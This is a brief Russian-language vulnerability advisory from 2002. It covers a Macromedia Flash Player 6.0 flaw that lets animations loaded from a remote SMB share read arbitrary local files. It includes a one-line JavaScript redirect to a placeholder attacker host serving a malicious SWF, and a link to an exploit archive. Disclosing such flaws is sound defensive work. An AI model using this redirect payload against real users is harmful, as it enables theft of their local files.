Security Lab

Чтение произвольных локальных файлов в Flash player

Дата публикации:09.10.2002
Всего просмотров:1312
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Ошибка, обнаруженная в Flash player, позволяет злонамеренным Flash анимациям читать произвольные локальные файлы.

Уязвимость происходит из-за ошибки в Flash Player при загрузке анимаций от отдаленных SMB ресурсов. Когда Flash Player загружает анимацию от сетевого SMB ресурса, она обрабатывается так, как если бы была загружена с локального жесткого диска пользователя. Уязвимость может использоваться через Web страницу, содержащую чтото типа такого:

<script language="javascript">
 document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>
Уязвимость обнаружена в Macromedia Flash 6.0-6.0.47
Ссылки: Flash player can read local files

http://www.xs4all.nl/~jkuperus/exploit.zip